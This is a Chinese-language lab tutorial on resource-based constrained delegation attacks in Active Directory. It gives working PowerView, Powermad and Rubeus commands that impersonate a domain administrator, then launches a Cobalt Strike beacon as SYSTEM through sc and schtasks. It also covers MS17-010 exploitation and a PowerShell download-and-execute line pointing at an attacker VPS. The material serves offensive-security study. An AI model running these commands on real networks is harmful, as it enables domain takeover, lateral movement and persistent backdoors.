域内攻击--->基于资源的约束委派(RBCD)

2024-06-02 17:28
文章标签 攻击 资源 约束 委派 rbcd

本文主要是介绍域内攻击--->基于资源的约束委派(RBCD),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

不同于约束和非约束委派,基于资源的约束性委派可以就难的多了!! 前方高能 ,准备上车!!

                 

目录

1.基于资源的约束性委派(RBCD)

2.谁能设置RBCD

3.机器入域账号的普及

4.域树的搭建

5.配置RBCD

6.通过域创建机器进行RBCD攻击

7.通过使用本机机器进行RBCD攻击

8.通过横向RBCD的用户进行攻击

9.RBCD的作用


1.基于资源的约束性委派(RBCD)

对于基于资源的约束性委派,可以说和非约束性委派和约束性委派都有一定的相似之处,为什么这么说呢,看下去你就明白了!!

基于资源的约束性委派攻击:(Resources Based Constricted Delegation ,RBCD)如果我们能够在受害者B上配置允许服务A的基于资源的约束性委派,那么可以通过控制服务A使用S4uSelf协议向域控请求任意用户访问自身的ST,最后再使用S4u2Proxy协议转发此ST去请求访问服务B的可转发ST,我们就可以模拟任意用户访问服务B了。

感觉没听懂?         没关系,我来用人话解释一下

不同于约束性委派,基于资源的约束性委派不算是一种被动委派,而是一种主动委派。什么意思呢? 对比起约束性委派,文件系统的cifs服务是又域控委派给web系统的,但是在RBCD中,Web系统能访问文件系统的cifs服务是由文件系统自己委派给他的!!!!

2.谁能设置RBCD

以下这么几种人能够设置RBCD

3.机器入域账号的普及

当我们将一台机器加入到域内的时候,我们肯定会弹出这么一个框架,这时候我们一般都是输入到的域馆的账号密码,但其实!!! 我们也是可以输入一个域内的普通账户的!!!!

我们来做一个实验

首先我们有一个域内的账户 liukaifeng01 并不属于管理员组。

它的sid是以1000结尾的!!  然后我们再去找一台电脑

于是,我们还知道,一个域内的普通账户,默认可以创建10台机器账户!!(这个后面大有用处)

4.域树的搭建

其实这个域树的搭建和RBCD没有什么直接的关系,但是!! RBCD的前提就是域控必须是Server2012及以上,但是我的god的域刚好的2008的,又恰好后面我们要讲跨域攻击,那么就刚好现在一同搭建了!!

我们的目的就是在原域控的情况下搭建一个hack.god.org的域树

    首先去准备我们的对应的机器!!!

然后我们去给Server2012安装对应的AD

然后一直下一步,开始安装

然后就是去升级了

在入域之前,记得配好指向域控的网卡

然后就下面这一步可谓是至关重要,不能写错一点啊(不然就会失败)

然后后面就是疯狂的进行下一步了,最后他会进行重启!!

能看见这样,就能说明我们已经搭建好了子域的域控,下一步就是将Server2016加入到子域了

   将dns指向子域的域控

   然后将这个SEC机器加到子域内

然后我们去子域控上创建一个用户,让2016能登录进去

然后我们最后用下面这命令去查看一下

ipconfig  /all

能看见这个,就说明我们的域环境已经搭建成功了!!! 

5.配置RBCD

现在域内有三台电脑


  • 域控Winserver2012
  • 域内主机Winserver2016
  • 域内主机Win10

其中Win10是以Winserver的sec用户加入到域的,那么我们就能用sec这个账号给Win10这台机器配置RBCD,我们先来验证一下

首先,我们这台SEC的用户的sid如下

然后我们再去域控查询Win10电脑的委派的sid,果然sid是一模一样的

然后我们给这台Win10机器设置RBCD

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3016729343-1492099483-2872154937-1106)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DESKTOP-LQVIT68.rce.org | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

ok,成功设置RBCD 

其实这里的命令要改的就两个点

  • 一个sid指的是你创建机器的SID或者当前机器的SID(能拿到当前机器的NTLM哈希)
  • 然后get-domaincompu那里是指允许配置RBCD的受害者机器

6.通过域创建机器进行RBCD攻击

然后假装我们现在拿到了一台域内机器


然后我们去查看一下域内的机器分别都是以什么用户加入的(需要当前用户的账号密码)

AdFind.exe -u sec -up admin@123 -b "DC=rce,DC=org" -f "objectClass=computer" mS-DS-CreatorSID

发现了域内有四台机器,其中SUBDC和SEC都是以管理员加入的,这种就没戏了,但是Win7和另外一台电脑却是以另外一个用户加入的,于是我们就去查查是哪一个用户

shell sid2user.exe \\192.168.111.138  5 21 3016729343 1492099483 2872154937 1106

发现是sec用户 

并且正好,我们控制的这一台电脑的当前用户就是sec

    

所以,我们是可以拿下WIN7$和DESKTOP-LQVIT68$这两台机器的,然后我们先横向到DESKTOP-LQVIT68$这台电脑

powershell-import Powermad.ps1
powershell Set-ExecutionPolicy Bypass -Scope Process | New-MachineAccount -MachineAccount god -Password $(ConvertTo-SecureString "admin@123" -AsPlainText -Force)

通过上面这个脚本,我们可以创建一台计算机,名为GOD,密码是admin@123

然后去查看一下机器是否创建成功

shell net groups "Domain Computers" /domain

可以看见多了一个机器账号 

然后,正如我们前面所说,创建机器的委派sid和创建的用户是相同的

这是我们刚创建的机器委派的sid

然后我们再去看我们创建机器的账号的sid,肯定是一样的

然后我们就要去获取这个机器的SID(不是委派sid),这里需要你传一个powerview脚本,或者你也可以再CS直接导入,达到无文件落地的效果

powershell.exe -exec bypass -Command "& {Import-Module .\PowerView.ps1;Get-DomainComputer -Identity god -Properties objectsid}"

然后就是给这个台GOD机器设置RBCD

powershell-import PowerView.ps1   //无文件落地
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3016729343-1492099483-2872154937-1115)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer DESKTOP-LQVIT68 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

然后我们去查

shell AdFind.exe -b "DC=rce,DC=org" -f "(&(samAccountType=805306369)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" -dn

成功配置 

然后我们就是可以进行横向移动了

Rubeus.exe s4u /user:机器名 /rc4:创建机器的密码  /domain:rce.org  /msdsspn:cifs/受害机器  /impersonateuser:administrator /ptt
Rubeus.exe s4u /user:god$  /rc4:579DA618CFBFA85247ACF1F800A280A4  /domain:rce.org  /msdsspn:cifs/DESKTOP-LQVIT68.rce.org  /impersonateuser:administrator /ptt

这个rc4密码最好找一个在线生成密码的网站

在攻击之前,我们先清一下票

shell klist purge
mimikatz kerberos::purge

然后在攻击之前,我们是肯定不能看别人的东西的

然后我们直接PTT攻击

这时候,我们再去看内存中的票据

然后我们再去访问,包能看到的

然后我们把🐎传上去

然后接下来就要问你们了,我们现在能不能运行计划任务或者服务???

包不行的啊!! RBCD其实也有点像约束性委派,也有点像白银票据!!!

我们这是什么票???? CIFS ! 怎么可能可以运行计划任务或者服务 ???

所以我们要去再申请一张host的票据

Rubeus.exe s4u /user:god$ /rc4:579DA618CFBFA85247ACF1F800A280A4 /impersonateuser:administrator /msdsspn:host/DESKTOP-LQVIT68 /ptt

这样,我们的内存就有两张票了!!!!  

然后接下来就是愉快的进行横线移动了 !!

shell sc \\DESKTOP-LQVIT68 create getshell binpath= "cmd.exe /c c:\cs.exe"
shell sc \\DESKTOP-LQVIT68 start getshell

 看到没,直接以system权限上线!!!

包高的,这个权限!!!

7.通过使用本机机器进行RBCD攻击

有人就会说了,我还要创建一个账号,麻烦死了,能不能直接用本机机器账号呢??? 

那包可以的!!                

首先还是我们上面的情景,然后我们直接查询本机的sid

powershell.exe -exec bypass -Command "& {Import-Module .\PowerView.ps1;Get-DomainComputer -Identity 机器名字 -Properties objectsid}"

然后我们抓一下本机账号的密码(这一步需要提权,这就是为什么我先讲创建机器账户,因为有的时候我们提不上来)  但是不重要,这个方法本质·上是可以的,来掩饰一下!!

假设我们提上来了,并且抓到了密码

db09d063eafb6f737ab67e1022f19662

然后配置委派

powershell-import Powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3016729343-1492099483-2872154937-1107)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer DESKTOP-LQVIT68 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

设置成功,查看一下先

AdFind.exe -b "DC=rce,DC=org" -f "(&(samAccountType=805306369)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" -dn

okay,目前看起来一切顺利 !!!,然后就是去请求票据,在请求之前,肯定是看不了的

然后直接伪造

Rubeus.exe s4u /user:SEC$ /rc4:db09d063eafb6f737ab67e1022f19662 /impersonateuser:administrator /msdsspn:cifs/DESKTOP-LQVIT68 /ptt

然后再去看一下

包能看到的,最后再去伪造一张host的票

然后这次,我选择用计划任务横向移动 !!

copy cs.exe \\DESKTOP-LQVIT68\c$
schtasks /create /s DESKTOP-LQVIT68 /tn getshell /sc onstart /tr c:\cs.exe /ru system /f
schtasks /run /s  DESKTOP-LQVIT68 /i /tn "getshell"

包上线的!!!! 

8.通过横向RBCD的用户进行攻击

以上的两种情况,可以说是最理想化了,直接拿到了RBCD的账号,但是很多时候我们都是不会直接拿到这个账号的?? 那怎么办呢??

  • Kerberoasting(这个我后面讲)
  • asq roasting
  • 密码喷洒
  • 横向移动(pth,ptk,ptt,dcom,wimrm)那些
  • 漏洞!!(MS17010)

那么这次我就拿MS17010来演示一下

首先拿到了一个用户,然后查询

shell AdFind.exe -b "DC=rce,DC=org" -f "(&(samAccountType=805306369))" cn mS-DS-CreatorSID

发现两个可操作主机,然后反查

AdFind.exe -sc adsid:S-1-5-21-3016729343-1492099483-2872154937-1106 -dn
AdFind.exe -sc adsid:S-1-5-21-3016729343-1492099483-2872154937-1108 -dn

分别查出是sec账户和win7账户 

sec是我们当前的用户,可以操作,但是这标题是横向到RBCD的用户,所以我们就要想办法横向到Win7账户登录的机器上面去

怎么知道Win7在哪一台机器上登录呢??? 这就需要到内网信息收集工具netview啦!!

shell netview.exe -d

成功获得ip,然后我们扫描一下 

通过fscan,我们发现对方存在永恒之蓝!!!

然后我们把他上线到CS!!

但是我咋感觉这个插件不太好用,直接把别人打关机了(无敌了),换个插件再试试

欸~~~~~ 换了个插件还是很舒服的!!! 然后就是常规步骤了,先去看看能给谁设置委派

然后你就会发现,用system用户的权限查询的到的结果和普通用户查询结果是不一样的,这个时候我们就要降权 !!!!

这时候我们就先去抓一下密码!!

然后我们用lsrunase.exe和他对应的加密工具操作

  先加密,然后再去传工具

然后执行下面这个命令

shell lsrunase.exe  /user:win7 /password:5VB+iOQH7araqPPoHYU=  /command:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://公网vps/powershell.ps1'))" /runpath:c:  /domain:rce.org

本来想无文件的,但是发现 。。。。难崩

那就只能用最简单的计划任务了!!!

schtasks /create /s 192.168.111.132 /tn shell /sc onstart /tr C:\Users\win7\Desktop\cs.exe /ru win7 /f
schtasks /run /s 192.168.111.132 /i /tn "shell"

然后就更牛魔了!!   有点恐怖的兄弟 灾难性故障

但是最后在网上又搜到了一篇文章 ,这个思路就很猎奇新奇

shell explorer.exe C:\Users\win7\Desktop\cs.exe

用explorer去启动,欸~~!! 还真的成功了!!

至此,我们就成功的拿到了权限不同的两个账户了!!!! 然后我们再去执行查询

发现我们当前机器没有对任何机器设置过委派(WIN7是被指定的委派,不要搞混了)

所以我们就可以用上面的随便一种方法都可以!!! 先去查当前Win7的SID

powershell.exe -exec bypass -Command "& {Import-Module .\PowerView.ps1;Get-DomainComputer -Identity win7 -Properties objectsid}"

查出来了,然后直接将hack这台机器用户指定为当前机器的RBCD

powershell-import Powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3016729343-1492099483-2872154937-1111)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer DESKTOP-LQVIT68 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

然后发现没反应 

说明可能是禁止了powershell执行脚本!! 我们需要手动开启

set-ExecutionPolicy RemoteSigned

但是还是发现无法执行,很难搞

难道是版本问题?? 我们尝试一下创建机器用户

然后查他的sid

再去设置委派!!!

powershell.exe -exec bypass -Command "Import-Module .\PowerView.ps1;$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3016729343-1492099483-2872154937-1117)\";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer DESKTOP-LQVIT68 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose"

然后就难受了,配置不成功,可能是我的机器的问题,你们可以多去试试,试试server什么的!

9.RBCD的作用

  • 权限维持,还记不记得我们说过SYSTEM权限可以给本机创建RBCD的权限!!那么我们当拿到一台机器之后,就可以提权到SYSTEM,然后做一个RBCD的后门(让他指向一台你创建的后门机器!!!)
  • 横向移动,不过这个一般横向不到域管理员,(除非你是account operator这个账户的用户),否则是不能进行横向到域馆的!!!
  • 拿下域控,这个就要研究的比较深了,网上也有很多对应的文章,可以自己去研究一下,我后续也会更(不过这就是很后面的事情了)

以上,就是RBCD的大致利用和内容了!!! 这个比较难理解,而且是只看文字的话,可以反复揣测一下!!

   

这篇关于域内攻击--->基于资源的约束委派(RBCD)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1024616

相关文章

SQL中的外键约束

外键约束用于表示两张表中的指标连接关系。外键约束的作用主要有以下三点: 1.确保子表中的某个字段(外键)只能引用父表中的有效记录2.主表中的列被删除时,子表中的关联列也会被删除3.主表中的列更新时,子表中的关联元素也会被更新 子表中的元素指向主表 以下是一个外键约束的实例展示

poj 3159 (spfa差分约束最短路) poj 1201

poj 3159: 题意: 每次给出b比a多不多于c个糖果,求n最多比1多多少个糖果。 解析: 差分约束。 这个博客讲差分约束讲的比较好: http://www.cnblogs.com/void/archive/2011/08/26/2153928.html 套个spfa。 代码: #include <iostream>#include <cstdio>#i

poj 3169 spfa 差分约束

题意: 给n只牛,这些牛有些关系。 ml个关系:fr 与 to 牛间的距离要小于等于 cost。 md个关系:fr 与 to 牛间的距离要大于等于 cost。 隐含关系: d[ i ] <= d[ i + 1 ] 解析: 用以上关系建图,求1-n间最短路即可。 新学了一种建图的方法。。。。。。 代码: #include <iostream>#include

POJ 1364差分约束

给出n个变量,m个约束公式 Sa + Sa+1 + .... + Sa+b < ki or > ki ,叫你判断是否存在着解满足这m组约束公式。 Sa + Sa+1   +   .+ Sa+b =  Sum[a+b] - Sum[a-1]  . 注意加入源点n+1 。 public class Main {public static void main(Strin

速盾高防cdn是怎么解决网站攻击的?

速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。 速盾高防CDN主要采用以下几种方式来解决网站攻击: 分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网

49个权威的网上学习资源网站

艺术与音乐 Dave Conservatoire — 一个完全免费的音乐学习网站,口号是“让每一个人都可以接受世界级的音乐教育”,有视频,有练习。 Drawspace — 如果你想学习绘画,或者提高自己的绘画技能,就来Drawspace吧。 Justin Guitar — 超过800节免费的吉他课程,有自己的app,还有电子书、DVD等实用内容。 数学,数据科学与工程 Codecad

创建表时添加约束

查询表中的约束信息: SHOW KEYS FROM 表名; 示例: 创建depts表包含department_id该列为主键自动增长,department_name列不允许重复,location_id列不允许有空值。 create table depts(department_id int primary key auto_increment,department_name varcha

汇编:嵌入式软件架构学习资源

成为嵌入式软件架构设计师需要掌握多方面的知识,包括嵌入式系统、实时操作系统、硬件接口、软件设计模式等。 以下是一些推荐的博客和网站,可以帮助你深入学习嵌入式软件架构设计: ### 1. **Embedded.com**    - **网址**: [Embedded.com](https://www.embedded.com/)    - **简介**: 这是一个专注于嵌入式系统设计的专业网

Unity 资源 之 Super Confetti FX:点亮项目的璀璨粒子之光

Unity 资源 之 Super Confetti FX:点亮项目的璀璨粒子之光 一,前言二,资源包内容三,免费获取资源包 一,前言 在创意的世界里,每一个细节都能决定一个项目的独特魅力。今天,要向大家介绍一款令人惊艳的粒子效果包 ——Super Confetti FX。 二,资源包内容 💥充满活力与动态,是 Super Confetti FX 最显著的标签。它宛如一位

非空约束(Not Null)

修改表添加非空约束 使用DDL语句添加非空约束 ALTER TABLE 表名 MODIFY 列名 类型 NOT NULL; 示例: 向emp表中的salary添加非空约束。 alter table emp modify salary float(8,2) not NULL; 删除非空约束 使用DDL语句删除非空约束 ALTER TABLE 表名 MODIFY 列名 类型 NULL;